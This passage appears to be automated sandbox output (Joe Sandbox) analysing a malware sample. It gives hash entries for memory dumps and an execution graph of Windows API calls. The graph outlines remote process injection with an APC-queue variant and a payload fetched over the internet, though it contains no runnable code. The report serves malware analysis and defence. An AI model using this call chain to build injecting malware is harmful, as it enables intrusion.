                • Instruction ID: 70726cac1e7c82ca6d60547011b3e813f051683e4322bd3689d5915a903f0a99
                • Opcode Fuzzy Hash: b989f179b47119314d126d584f7f78e4268f872f64b66dfaa5d0dce2149c2226
                • Instruction Fuzzy Hash: 1FD01200D5E1870AEB1B23F91862594BF504F57160F8942B2D854C75E7D98D259A8272
                Memory Dump Source
                • Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 75e2c200183d9288403185452ae7f39835662dee42986eb38357594adb0b9ab6
                • Instruction ID: c005f10a164e05a640a54d7f2a44a9f728bfb39a1246641c8838143a29c4a118
                • Opcode Fuzzy Hash: 75e2c200183d9288403185452ae7f39835662dee42986eb38357594adb0b9ab6
                • Instruction Fuzzy Hash: 04E0C2318A93CD4FCB126BA858221DA7F64AF15200F4501DBE81CCB093D624661483A3
                Memory Dump Source
                • Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 22f81112643ec07e2a86c45cd9c0a4cb04c91263063b09da35d091e7ddf32000
                • Instruction ID: 97cd3ec90308be692b50a99ebf37ae1b93f2c7a745fa7c428b65309a9e059605
                • Opcode Fuzzy Hash: 22f81112643ec07e2a86c45cd9c0a4cb04c91263063b09da35d091e7ddf32000
                • Instruction Fuzzy Hash: 29D0C900F9980E16FA8876ED7866BFCA182CFC8315FA546B1E41CC22DFCC4C6D825253
                Memory Dump Source
                • Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4afdf4dffd4dbc01bf7bd46195aff09f629d4a374197c65046e8e9c5bc2e9dfa
                • Instruction ID: 8fa017f35baae9fe87e0bb5cc5bdc71421a8c14c1f4231f980d2eda21baafb92
                • Opcode Fuzzy Hash: 4afdf4dffd4dbc01bf7bd46195aff09f629d4a374197c65046e8e9c5bc2e9dfa
                • Instruction Fuzzy Hash: 08D05E10B1DA862FE745B3F85427A9DA9E19FD4300F1541B9A405831E7CC5C98419212
                Memory Dump Source
                • Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 44316bd6cb8698757b11ada2b63c4fdd4ee0dbe42d85899accdbea9fe024f1a4
                • Instruction ID: 4bad5d6071811878fc8a3b5c51ef659e473a11ee7bbfb9c78f229f5ba57a05c6
                • Opcode Fuzzy Hash: 44316bd6cb8698757b11ada2b63c4fdd4ee0dbe42d85899accdbea9fe024f1a4
                • Instruction Fuzzy Hash: 0BD0A715B1DA897BE745B3F85827BAE69E19FC4310F1541B9E805C31D7CC4C9841D713
                Memory Dump Source
                • Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0d8787514857c3626f54a2d5fe5a0ab2c2ef4f69ee19aebfbce13961f6ccfe57
                • Instruction ID: ae75f9a9dd3fffb93c49b74d5892911d4785e6106a2c2d8f2a2f6a287a5e45ae
                • Opcode Fuzzy Hash: 0d8787514857c3626f54a2d5fe5a0ab2c2ef4f69ee19aebfbce13961f6ccfe57
                • Instruction Fuzzy Hash: EBD05E00B1DA817BE745B3F85427B5DA9E19FC4200F1541BAA409C31D7CC4C98458212
                Memory Dump Source
                • Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9469d93f786f59887e058ff8ee38cb8c5f8e0e1a8dd35f07b378f7c03077812b
                • Instruction ID: b95762a4780a666ffc54ebbb22ab97c984b9a7fb5420ab3e1b2a973eaf8409ca
                • Opcode Fuzzy Hash: 9469d93f786f59887e058ff8ee38cb8c5f8e0e1a8dd35f07b378f7c03077812b
                • Instruction Fuzzy Hash: 53D05E01B5DA853BE785B3F85426BAD69E19FD4600F1541B9E409835D7CC4C98419212
                Memory Dump Source
                • Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6dcf41abe46292bf716cb29ec9ed593815d45e9970539a5e9be4b72280b9fd1d
                • Instruction ID: 88bd814cb38d8f876181e9daca7971269ee22a1c53c1b4b7a16cbbc3d35e7942
                • Opcode Fuzzy Hash: 6dcf41abe46292bf716cb29ec9ed593815d45e9970539a5e9be4b72280b9fd1d
                • Instruction Fuzzy Hash: 7BD05E01B1DA857BE385B3F85526B5E69E19FC4200F1542B9E409831D7CC4CA8418212
                Memory Dump Source
                • Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2cc02e992ab2aeab1cdf2881f4e4a94a5424e5708be0cf5be7a43c652b4c8121
                • Instruction ID: 577a81585f0b9816d852e2448601eaeec1314cda8eebb307c8d4bbd0ddc49403
                • Opcode Fuzzy Hash: 2cc02e992ab2aeab1cdf2881f4e4a94a5424e5708be0cf5be7a43c652b4c8121
                • Instruction Fuzzy Hash: F7D05E11B1DA897BE785B3F85426A9D69E19FC4300F1581B9A409C31E7CC4C98459312
                Memory Dump Source
                • Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8d542d7304e2cc86dddc4c5c7626582e4b7497e04f73076e822ba11c925f164f
                • Instruction ID: 03776025d4c0220239ceb36137f23afb7e82682277e013a2be16892e30caf52a
                • Opcode Fuzzy Hash: 8d542d7304e2cc86dddc4c5c7626582e4b7497e04f73076e822ba11c925f164f
                • Instruction Fuzzy Hash: 35B01200D6780F00DC2433F5085216878009F5C700FC60070D408C00D1984D1B9511E2

                Execution Graph

                Execution Coverage:2.6%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:0%
                Total number of Nodes:762
                Total number of Limit Nodes:6
                execution_graph 35234 b614f0 35239 ba2d30 35234->35239 35236 b61506 35243 b61180 35236->35243 35238 b6150b 35240 ba2d59 35239->35240 35241 ba2d70 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 35239->35241 35240->35236 35242 ba2dcb 35241->35242 35242->35236 35244 b611b4 35243->35244 35245 b61460 GetStartupInfoA 35243->35245 35247 b611e1 Sleep 35244->35247 35248 b611f6 35244->35248 35246 b613c8 35245->35246 35246->35238 35247->35244 35249 b6142c _initterm 35248->35249 35250 b61229 35248->35250 35252 b613b4 35248->35252 35249->35250 35266 ba3370 35250->35266 35252->35246 35255 ba2d30 5 API calls 35252->35255 35253 b61251 SetUnhandledExceptionFilter 35286 ba3880 35253->35286 35256 b614d6 35255->35256 35257 b61180 128 API calls 35256->35257 35258 b614db 35257->35258 35258->35238 35259 b6130e malloc 35261 b61335 35259->35261 35262 b6137b 35259->35262 35260 b6126d 35260->35259 35263 b61340 strlen malloc memcpy 35261->35263 35292 b68820 35262->35292 35263->35263 35264 b61376 35263->35264 35264->35262 35271 ba33a8 35266->35271 35285 ba3392 35266->35285 35267 ba35e0 35268 ba35da 35267->35268 35267->35285 35268->35267 35273 ba362c 35268->35273 35325 ba3160 8 API calls 35268->35325 35269 ba356e 35269->35273 35323 ba3160 8 API calls 35269->35323 35270 ba3648 35327 ba30f0 8 API calls 35270->35327 35271->35267 35271->35269 35271->35270 35279 ba3450 35271->35279 35271->35285 35326 ba30f0 8 API calls 35273->35326 35277 ba3654 35277->35253 35278 ba35a8 35324 ba3160 8 API calls 35278->35324 35279->35269 35279->35273 35279->35278 35281 ba3160 8 API calls 35279->35281 35282 ba34f6 35279->35282 35284 ba3500 35279->35284 35281->35279 35282->35284 35283 ba3532 VirtualProtect 35283->35284 35284->35283 35284->35285 35285->35253 35288 ba388f 35286->35288 35287 ba38bc 35287->35260 35288->35287 35328 ba3e20 strncmp 35288->35328 35290 ba38b7 35290->35287 35291 ba3965 RtlAddFunctionTable 35290->35291 35291->35287 35293 b68836 35292->35293 35294 b68859 SetThreadDescription 35293->35294 35329 b7afc0 35294->35329 35298 b68899 35299 b688a2 35298->35299 35300 b68933 35298->35300 35301 b6896c 35299->35301 35302 b688ac 35299->35302 35383 b6b530 44 API calls 35300->35383 35384 b7b230 44 API calls 35301->35384 35355 b7c560 35302->35355 35306 b6896a 35386 b7b080 45 API calls 35306->35386 35307 b688c8 35308 b689aa 35307->35308 35309 b688d1 35307->35309 35385 b6b6f0 44 API calls 35308->35385 35379 b627fb 35309->35379 35315 b68927 35315->35252 35323->35278 35324->35268 35325->35268 35326->35270 35327->35277 35328->35290 35387 b9f490 35329->35387 35332 b7b040 35394 b68e20 44 API calls 35332->35394 35333 b7afe8 35336 b6887e 35333->35336 35393 b7ceb0 44 API calls 35333->35393 35335 b7b03e 35395 ba28b0 RtlCaptureContext RtlUnwindEx abort 35335->35395 35342 b7c630 35336->35342 35343 b7c6d0 35342->35343 35344 b7c64b TlsGetValue 35342->35344 35403 b7c7f0 44 API calls 35343->35403 35347 b7c65a 35344->35347 35352 b7c69d 35344->35352 35348 b9f490 HeapAlloc 35347->35348 35347->35352 35349 b7c66f 35348->35349 35350 b7c674 TlsGetValue TlsSetValue 35349->35350 35351 b7c6e3 35349->35351 35350->35352 35404 b68e20 44 API calls 35351->35404 35352->35298 35354 b7c6f2 35356 b7c605 35355->35356 35357 b7c57e TlsGetValue 35355->35357 35405 b7c7f0 44 API calls 35356->35405 35360 b7c58d 35357->35360 35366 b7c5a9 35357->35366 35361 b9f490 HeapAlloc 35360->35361 35360->35366 35362 b7c5c2 35361->35362 35363 b7c5c7 TlsGetValue TlsSetValue 35362->35363 35364 b7c618 35362->35364 35363->35366 35406 b68e20 44 API calls 35364->35406 35366->35307 35367 b7c627 35368 b7c64b TlsGetValue 35367->35368 35407 b7c7f0 44 API calls 35367->35407 35371 b7c65a 35368->35371 35377 b7c69d 35368->35377 35372 b9f490 HeapAlloc 35371->35372 35371->35377 35373 b7c66f 35372->35373 35374 b7c674 TlsGetValue TlsSetValue 35373->35374 35375 b7c6e3 35373->35375 35374->35377 35408 b68e20 44 API calls 35375->35408 35377->35307 35378 b7c6f2 35409 b64aa1 35379->35409 35380 b62801 35380->35315 35382 b7b090 WaitOnAddress GetLastError WakeByAddressAll 35380->35382 35382->35315 35383->35306 35384->35308 35388 b9f4a5 HeapAlloc 35387->35388 35391 b9f4ab 35387->35391 35390 bba4e8 35388->35390 35391->35388 35392 b7afe3 35391->35392 35392->35332 35392->35333 35394->35335 35396 ba296b 35395->35396 35397 ba2975 35395->35397 35401 ba2850 RaiseException 35396->35401 35400 ba2970 abort 35397->35400 35402 ba24e0 RaiseException 35397->35402 35400->35397 35401->35400 35402->35397 35403->35344 35404->35354 35405->35357 35406->35367 35407->35368 35408->35378 35835 b71956 35409->35835 35411 b64abd 35412 b64ac6 35411->35412 35413 b64ba7 35411->35413 35414 b64ad2 35412->35414 35415 b64bd0 35412->35415 36020 b6b530 44 API calls 35413->36020 36013 ba2145 35414->36013 35852 b6499c 35415->35852 35420 b6499c 45 API calls 35421 b64c34 35420->35421 35857 b63b76 35421->35857 35425 b64c44 35428 b6499c 45 API calls 35425->35428 35426 b64af5 35427 b64b7e 35426->35427 36018 b718bc 44 API calls 35426->36018 36019 b634c8 45 API calls 35426->36019 35427->35380 35429 b64c6f 35428->35429 35890 b648c3 35429->35890 35431 b64c82 35432 b6499c 45 API calls 35431->35432 35433 b64cb5 35432->35433 35434 b648c3 45 API calls 35433->35434 35435 b64cc8 35434->35435 35436 b6499c 45 API calls 35435->35436 35437 b64cf8 35436->35437 35438 b648c3 45 API calls 35437->35438 35439 b64d0b 35438->35439 35440 b6499c 45 API calls 35439->35440 35441 b64d38 35440->35441 35442 b648c3 45 API calls 35441->35442 35443 b64d4b 35442->35443 35444 b6499c 45 API calls 35443->35444 35445 b64d7b 35444->35445 35446 b648c3 45 API calls 35445->35446 35447 b64d8e 35446->35447 35448 b6499c 45 API calls 35447->35448 35449 b64dbe 35448->35449 35450 b648c3 45 API calls 35449->35450 35451 b64dd1 35450->35451 35452 b6499c 45 API calls 35451->35452 35453 b64dfc 35452->35453 35454 b648c3 45 API calls 35453->35454 35455 b64e0f 35454->35455 35456 b6499c 45 API calls 35455->35456 35457 b64e3f 35456->35457 35458 b648c3 45 API calls 35457->35458 35459 b64e52 35458->35459 35460 b6499c 45 API calls 35459->35460 35461 b64e7f 35460->35461 35462 b648c3 45 API calls 35461->35462 35463 b64e92 35462->35463 35464 b6499c 45 API calls 35463->35464 35465 b64ebf 35464->35465 35466 b648c3 45 API calls 35465->35466 35467 b64eda 35466->35467 35468 b6499c 45 API calls 35467->35468 35469 b64f02 LoadLibraryA 35468->35469 35470 b64f16 35469->35470 35471 b6499c 45 API calls 35470->35471 35472 b64f33 LoadLibraryA 35471->35472 35473 b64f47 35472->35473 35474 b6499c 45 API calls 35473->35474 35475 b64f64 35474->35475 35476 b6499c 45 API calls 35475->35476 35477 b64f9a 35476->35477 35478 b63b76 52 API calls 35477->35478 35479 b64faa 35478->35479 35480 b6499c 45 API calls 35479->35480 35481 b64fd5 35480->35481 35482 b648c3 45 API calls 35481->35482 35483 b64fe8 35482->35483 35484 b6499c 45 API calls 35483->35484 35485 b65018 35484->35485 35486 b648c3 45 API calls 35485->35486 35487 b6502b 35486->35487 35488 b6499c 45 API calls 35487->35488 35489 b6505b 35488->35489 35490 b63b76 52 API calls 35489->35490 35491 b6506b 35490->35491 35492 b6499c 45 API calls 35491->35492 35493 b65096 35492->35493 35494 b648c3 45 API calls 35493->35494 35495 b650a9 35494->35495 35496 b6499c 45 API calls 35495->35496 35497 b650d9 35496->35497 35498 b648c3 45 API calls 35497->35498 35499 b650ec 35498->35499 35500 b6499c 45 API calls 35499->35500 35501 b6511c 35500->35501 35502 b648c3 45 API calls 35501->35502 35503 b65131 35502->35503 35504 b6499c 45 API calls 35503->35504 35505 b6515d 35504->35505 35897 b9f130 35505->35897 35507 b651a8 35508 b6499c 45 API calls 35507->35508 35509 b65211 CreateProcessA 35508->35509 35510 b681c7 35509->35510 35511 b6524e 35509->35511 35512 b6499c 45 API calls 35510->35512 35513 b6499c 45 API calls 35511->35513 35514 b681e9 35512->35514 35515 b65285 35513->35515 36044 b68765 44 API calls 35514->36044 35517 b9f130 48 API calls 35515->35517 35519 b652fb 35517->35519 35518 b681f1 35520 b6499c 45 API calls 35518->35520 35523 b6499c 45 API calls 35519->35523 35521 b68206 35520->35521 36045 b69650 44 API calls 35521->36045 35525 b65325 35523->35525 35524 b68275 35526 b6499c 45 API calls 35524->35526 35527 b9f130 48 API calls 35525->35527 35529 b68292 35526->35529 35528 b65378 35527->35528 35532 b6499c 45 API calls 35528->35532 36046 b68776 44 API calls 35529->36046 35531 b6829a 35533 b6499c 45 API calls 35531->35533 35534 b653a2 35532->35534 35535 b682b7 35533->35535 35536 b9f130 48 API calls 35534->35536 36047 b68787 44 API calls 35535->36047 35538 b653e1 35536->35538 35543 b6499c 45 API calls 35538->35543 35539 b682bf 35540 b6499c 45 API calls 35539->35540 35541 b682dc 35540->35541 36048 b68798 44 API calls 35541->36048 35545 b65413 VirtualAllocEx 35543->35545 35544 b682e4 35546 b6499c 45 API calls 35544->35546 35547 b6499c 45 API calls 35545->35547 35548 b68301 35546->35548 35549 b65458 35547->35549 36049 b687a9 44 API calls 35548->36049 35551 b9f130 48 API calls 35549->35551 35553 b654b7 35551->35553 35552 b68309 35554 b6499c 45 API calls 35552->35554 35555 b654cc WriteProcessMemory 35553->35555 35556 b68326 35554->35556 35555->35518 35557 b654fd 35555->35557 36050 b687ba 44 API calls 35556->36050 35559 b6499c 45 API calls 35557->35559 35561 b6551a 35559->35561 35560 b6832e 35562 b6499c 45 API calls 35560->35562 35563 b6499c 45 API calls 35561->35563 35564 b6834b 35562->35564 35565 b6552f 35563->35565 36051 b687cb 44 API calls 35564->36051 35567 b9f130 48 API calls 35565->35567 35568 b655ab 35567->35568 35571 b6499c 45 API calls 35568->35571 35569 b68353 36052 b68dc0 44 API calls 35569->36052 35573 b655e2 35571->35573 35572 b6840f 36053 b6a0a0 44 API calls 35572->36053 35574 b648c3 45 API calls 35573->35574 35576 b655fc 35574->35576 35577 b6499c 45 API calls 35576->35577 35578 b65620 35577->35578 35579 b9f130 48 API calls 35578->35579 35580 b6567b 35579->35580 35581 b65690 CreateRemoteThread 35580->35581 35582 b6499c 45 API calls 35581->35582 35584 b656df 35582->35584 35585 b9f130 48 API calls 35584->35585 35588 b6572d 35585->35588 35589 b6499c 45 API calls 35588->35589 35590 b65763 35589->35590 35591 b9f130 48 API calls 35590->35591 35592 b657a4 35591->35592 35593 b6499c 45 API calls 35592->35593 35594 b657cd 35593->35594 35595 b6499c 45 API calls 35594->35595 35596 b657ea 35595->35596 35597 b63b76 52 API calls 35596->35597 35598 b657fa 35597->35598 35599 b6499c 45 API calls 35598->35599 35600 b65825 35599->35600 35601 b648c3 45 API calls 35600->35601 35602 b65838 35601->35602 35603 b6499c 45 API calls 35602->35603 35604 b65865 35603->35604 35605 b9f130 48 API calls 35604->35605 35606 b658b0 35605->35606 35607 b658c5 VirtualProtectEx 35606->35607 35607->35524 35608 b65904 WriteProcessMemory 35607->35608 35608->35531 35609 b65935 35608->35609 35610 b6499c 45 API calls 35609->35610 35611 b65952 35610->35611 35612 b6499c 45 API calls 35611->35612 35613 b65967 35612->35613 35614 b9f130 48 API calls 35613->35614 35615 b659e0 35614->35615 35616 b65a0a VirtualProtectEx 35615->35616 35616->35539 35617 b65a3a 35616->35617 35618 b6499c 45 API calls 35617->35618 35619 b65a4f 35618->35619 35620 b9f130 48 API calls 35619->35620 35621 b65a90 35620->35621 35622 b6499c 45 API calls 35621->35622 35623 b65abf 35622->35623 35624 b6499c 45 API calls 35623->35624 35625 b65adc 35624->35625 35626 b63b76 52 API calls 35625->35626 35627 b65aec 35626->35627 35628 b6499c 45 API calls 35627->35628 35629 b65b17 35628->35629 35630 b648c3 45 API calls 35629->35630 35631 b65b2a 35630->35631 35632 b6499c 45 API calls 35631->35632 35633 b65b4e 35632->35633 35634 b9f130 48 API calls 35633->35634 35635 b65bb6 35634->35635 35636 b65bcb VirtualProtectEx 35635->35636 35636->35544 35637 b65c0c WriteProcessMemory 35636->35637 35637->35552 35638 b65c3b 35637->35638 35639 b6499c 45 API calls 35638->35639 35640 b65c58 35639->35640 35641 b6499c 45 API calls 35640->35641 35642 b65c75 35641->35642 35643 b9f130 48 API calls 35642->35643 35644 b65cee 35643->35644 35645 b65d18 VirtualProtectEx 35644->35645 35645->35560 35646 b65d3b 35645->35646 35647 b6499c 45 API calls 35646->35647 35648 b65d50 35647->35648 35649 b9f130 48 API calls 35648->35649 35650 b65da2 35649->35650 35651 b6499c 45 API calls 35650->35651 35652 b65dcb 35651->35652 35653 b9f130 48 API calls 35652->35653 35654 b65e06 35653->35654 35655 b65e12 memset 35654->35655 35656 b6499c 45 API calls 35655->35656 35657 b65e64 35656->35657 35922 b632c8 35657->35922 35659 b65e6f 35659->35569 35660 b65e78 InternetOpenA 35659->35660 35661 b6499c 45 API calls 35660->35661 35662 b65ec2 35661->35662 35663 b632c8 44 API calls 35662->35663 35664 b65ecd 35663->35664 35664->35569 35665 b65ed6 InternetOpenUrlA 35664->35665 35666 b65f14 InternetReadFile 35665->35666 35667 b65f29 35666->35667 35671 b65f50 35666->35671 35667->35666 35668 b680e6 35667->35668 35667->35671 35934 b63444 35667->35934 36039 b6a0a0 44 API calls 35668->36039 35671->35569 35939 b7a69c 35671->35939 35674 b68069 35675 b62dc4 HeapFree 35674->35675 35768 b67edb 35675->35768 35676 b667ae 35677 b66854 35676->35677 35678 b68521 35676->35678 35793 b68036 35676->35793 35682 b68454 35677->35682 35683 b66939 35677->35683 35677->35768 35677->35793 36061 b69700 44 API calls 35678->36061 35679 b6665f 35679->35572 35679->35676 35679->35793 36021 b695ca 44 API calls 35679->36021 36054 b6a0a0 44 API calls 35682->36054 35687 b66942 35683->35687 35716 b669a1 35683->35716 35685 b68468 35686 b6499c 45 API calls 35685->35686 35688 b68485 35686->35688 35691 b68596 35687->35691 35692 b6694f memset 35687->35692 36055 b687dc 44 API calls 35688->36055 35690 b6848d 35694 b6499c 45 API calls 35690->35694 36063 ba2116 44 API calls 35691->36063 35700 b66979 35692->35700 35695 b684aa 35694->35695 36056 b687ed 44 API calls 35695->36056 35697 b685f9 36065 ba2116 44 API calls 35697->36065 35698 b684b2 35702 b6499c 45 API calls 35698->35702 35699 b66a0c memcpy 36022 b63202 46 API calls 35699->36022 35700->35699 35705 b684cf 35702->35705 35704 b68584 36062 b69700 44 API calls 35704->36062 36057 b687fe 44 API calls 35705->36057 35706 b66a43 36023 b6dedc 45 API calls 35706->36023 35707 b68168 36040 b69700 44 API calls 35707->36040 35708 b65fd2 35708->35569 35708->35572 35708->35679 35752 b695ca 44 API calls 35708->35752 35708->35768 35708->35793 35712 b684d7 35714 b6499c 45 API calls 35712->35714 35713 b66a53 memcpy 36024 b6dedc 45 API calls 35713->36024 35717 b684f4 35714->35717 35716->35697 35716->35707 35719 b6818c 35716->35719 35722 b66c21 35716->35722 36058 b6880f 44 API calls 35717->36058 35718 b66a79 36025 b6dedc 45 API calls 35718->36025 36041 b69700 44 API calls 35719->36041 35721 b681b6 36043 b69700 44 API calls 35721->36043 35722->35721 35723 b681a0 35722->35723 35731 b66cfc 35722->35731 36042 b69700 44 API calls 35723->36042 35728 b684fc 36059 b6a0a0 44 API calls 35728->36059 35730 b66e12 memcpy 36027 b63202 46 API calls 35730->36027 35731->35730 35734 b66e49 36028 b6dedc 45 API calls 35734->36028 35736 b66aa1 36026 b6349c 44 API calls 35736->36026 35737 b66e59 memcpy 36029 b6dedc 45 API calls 35737->36029 35740 b66e7f 36030 b6dedc 45 API calls 35740->36030 35741 b66ad8 memcpy 35743 b66f7f memset 35741->35743 35747 b66ffd 35743->35747 35744 b66ea7 36031 b6349c 44 API calls 35744->36031 35746 b66ede memcpy 35746->35743 35747->35674 35748 ba2145 44 API calls 35747->35748 35749 b670b3 35747->35749 35748->35747 35943 b62dc4 35749->35943 35751 b67105 35753 b6712a VirtualAllocEx 35751->35753 35751->35768 35752->35708 35753->35685 35754 b6715e WriteProcessMemory 35753->35754 35754->35690 35756 b671b1 QueueUserAPC 35754->35756 35756->35698 35757 b671d1 ResumeThread 35756->35757 35757->35712 35758 b671f0 35757->35758 35759 b6499c 45 API calls 35758->35759 35760 b67205 35759->35760 35761 b9f130 48 API calls 35760->35761 35765 b67282 35761->35765 35762 b6733c SetLastError GetModuleFileNameW 35764 b67356 GetLastError 35762->35764 35762->35765 35764->35765 35766 b68111 GetLastError 35764->35766 35765->35762 35767 b6736b GetLastError 35765->35767 35769 b6739c 35765->35769 36032 b7fbf0 44 API calls 35765->36032 35766->35768 35767->35765 35767->35768 35807 b67ef0 35768->35807 36037 b6b530 44 API calls 35768->36037 36038 b6a560 44 API calls 35768->36038 36060 b6b6d0 44 API calls 35768->36060 35769->35728 35770 b673a5 35769->35770 35948 b7e7a0 35770->35948 35772 b673b5 35772->35768 35964 b9cd20 35772->35964 35774 b64aa1 75 API calls 35775 b6756a 35774->35775 35997 b633ff 35775->35997 35777 b675d5 35779 b64aa1 75 API calls 35777->35779 35778 b67458 35778->35768 35778->35774 35780 b6760b 35779->35780 35781 b633ff 44 API calls 35780->35781 35787 b67671 35781->35787 35782 b678a8 36033 b6d060 45 API calls 35782->36033 35784 b6770a 35784->35704 35796 b676c4 35784->35796 35800 b67795 35784->35800 35785 b678c3 35788 b678c8 35785->35788 35795 b678ff 35785->35795 35786 b6499c 45 API calls 35789 b67adb 35786->35789 35787->35704 35787->35782 35787->35784 35787->35796 35787->35807 36034 b62f1f 44 API calls 35788->36034 35790 b9f130 48 API calls 35789->35790 35791 b67b45 35790->35791 36035 b9dc70 44 API calls 35791->36035 35793->35768 36036 b631aa 44 API calls 35793->36036 35794 b67a03 36064 b6c3a0 44 API calls 35794->36064 35795->35794 35795->35796 35796->35786 35796->35807 35800->35793 35800->35796 35807->35380 35836 b71973 TlsGetValue 35835->35836 35837 b71ae8 35835->35837 35839 b71989 35836->35839 35841 b71acb 35836->35841 36073 b7c7f0 44 API calls 35837->36073 35839->35841 35842 b71a9a 35839->35842 36066 b73d17 35839->36066 35840 b71af4 36074 b69650 44 API calls 35840->36074 35841->35411 36072 b70e1a 44 API calls 35842->36072 35844 b719bb 35844->35840 35847 b719c4 35844->35847 36071 b70e1a 44 API calls 35847->36071 35849 b71aa9 TlsGetValue TlsSetValue 35849->35841 35851 b71a24 memset 35851->35842 35853 ba2145 44 API calls 35852->35853 35855 b64a03 35853->35855 35854 b64a7f 35854->35420 35855->35854 36076 b634c8 45 API calls 35855->36076 35863 b63ca7 35857->35863 35858 b64700 35859 ba2145 44 API calls 35858->35859 35860 b6470a 35859->35860 35861 b6499c 45 API calls 35860->35861 35865 b6472c 35861->35865 35862 b64848 36080 b68de0 44 API calls 35862->36080 35863->35858 35863->35860 35863->35862 35866 b9f490 HeapAlloc 35863->35866 35869 b6483b 35863->35869 35872 b64788 35863->35872 35875 b69530 44 API calls 35863->35875 35876 b64823 35863->35876 35879 b64435 memcpy 35863->35879 35881 b645eb memcpy 35863->35881 35884 b68e40 44 API calls 35863->35884 35887 b6410f 35863->35887 35888 b6dc10 44 API calls 35863->35888 35889 b6dd80 44 API calls 35863->35889 36077 b634c8 45 API calls 35863->36077 35867 b9f130 48 API calls 35865->35867 35866->35863 35867->35872 36079 b68dc0 44 API calls 35869->36079 35872->35425 35875->35863 36078 b69700 44 API calls 35876->36078 35879->35863 35881->35863 35884->35863 36081 b6c3a0 44 API calls 35887->36081 35888->35863 35889->35863 35891 b64900 strlen 35890->35891 35896 b6491d 35891->35896 35892 b64966 36082 b6b530 44 API calls 35892->36082 35894 b6499b 35895 b64947 35895->35431 35896->35891 35896->35892 35896->35895 35898 b9f2a9 35897->35898 35899 b9f16c 35897->35899 36102 b9eaa0 WaitOnAddress GetLastError WakeByAddressAll 35898->36102 36083 b7c110 35899->36083 35902 b9f2ae 36103 b7fc90 WaitOnAddress GetLastError 35902->36103 35903 b9f171 35903->35902 35904 b9f180 35903->35904 35917 b9f226 35904->35917 36095 b6a740 35904->36095 35909 b9f294 35916 b9f299 35909->35916 36104 b69650 44 API calls 35909->36104 35912 b9f1f4 36101 b69650 44 API calls 35912->36101 35913 b9f22b 35913->35909 35915 b9f28b WakeByAddressSingle 35913->35915 35915->35909 35916->35507 36105 b6b6f0 44 API calls 35917->36105 35924 b632f0 35922->35924 35923 b633b8 36233 b68dc0 44 API calls 35923->36233 35924->35923 35926 b632f5 35924->35926 35929 b63332 35924->35929 36232 b68ee0 HeapAlloc 35924->36232 35926->35659 35928 b63352 35928->35923 35928->35929 35929->35926 36234 b68dc0 44 API calls 35929->36234 35935 b63465 memcpy 35934->35935 35936 b63488 35934->35936 35935->35667 35937 ba2145 44 API calls 35936->35937 35938 b63496 35937->35938 35938->35935 35940 b7a6aa 35939->35940 35942 b7a6ba 35939->35942 35940->35942 36235 b7a5e4 35940->36235 35942->35708 35945 b62dd8 35943->35945 35944 b62df6 35944->35751 35945->35944 35946 ba23e4 HeapFree 35945->35946 35947 bba4f0 35946->35947 35949 b7e7c3 35948->35949 35954 b7e7ec 35948->35954 35950 b7e9b1 35949->35950 35951 b7e7c9 35949->35951 36242 b68de0 44 API calls 35950->36242 35953 b9f490 HeapAlloc 35951->35953 35955 b7e7da 35953->35955 35956 b7e991 35954->35956 35962 b7e8a0 35954->35962 36241 b7fa40 45 API calls 35954->36241 35955->35954 36240 b68dc0 44 API calls 35955->36240 35956->35772 35962->35956 35963 b7fa40 45 API calls 35962->35963 35963->35962 36243 b9c3a0 44 API calls 35964->36243 35966 b9ce88 SetLastError GetEnvironmentVariableW 35968 b9cd51 35966->35968 35969 b9cea8 GetLastError 35966->35969 35968->35966 35971 b9cec1 GetLastError 35968->35971 35973 b9cef3 35968->35973 35979 